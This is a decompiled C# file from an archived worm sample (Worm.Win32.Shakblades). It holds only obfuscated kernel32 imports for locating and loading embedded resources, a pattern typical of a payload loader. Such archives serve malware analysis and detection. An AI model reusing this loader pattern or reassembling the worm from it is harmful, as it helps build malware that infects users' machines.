MalwareSourceCode/MSIL/Worm/Win32/S/Worm.Win32.Shakblades.ajg-c60a207d49561351d0b84ea851120f247234d970b3dc83269c04540744be032b/G1iw5jvdvf5jyuwmtz03k02vp/Mvsaeg2eeoaqx3utk.cs
2022-08-18 06:28:56 -05:00

30 lines
1.2 KiB
C#

// Decompiled with JetBrains decompiler
// Type: G1iw5jvdvf5jyuwmtz03k02vp.Mvsaeg2eeoaqx3utk
// Assembly: pff4wjti, Version=6.1.7600.16385, Culture=neutral, PublicKeyToken=null
// MVID: 5406B450-382A-49C3-BEAD-27BB328AB378
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.Shakblades.ajg-c60a207d49561351d0b84ea851120f247234d970b3dc83269c04540744be032b.exe
using System;
using System.Runtime.InteropServices;
namespace G1iw5jvdvf5jyuwmtz03k02vp
{
public class Mvsaeg2eeoaqx3utk
{
[DllImport("kernel32", EntryPoint = "GetModuleHandleA", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr cz23ictx0pf1xcpsqzxf3ue5fsjhmn3fi(string lpModuleName);
[DllImport("kernel32.dll", EntryPoint = "FindResourceA")]
public static extern IntPtr Nyja0dryfvflph11ok4ga5zpz(
IntPtr hModule,
int lpID,
string lpType);
[DllImport("kernel32.dll", EntryPoint = "LoadResource", SetLastError = true)]
public static extern IntPtr Xpo3aq0mxqyvzr1zld5qguuzg(IntPtr hModule, IntPtr hResInfo);
[DllImport("kernel32.dll", EntryPoint = "SizeofResource", SetLastError = true)]
public static extern uint Wy3i4lea5jxu3fiu1mt0jbvl4gefufsn2(IntPtr hModule, IntPtr hResInfo);
}
}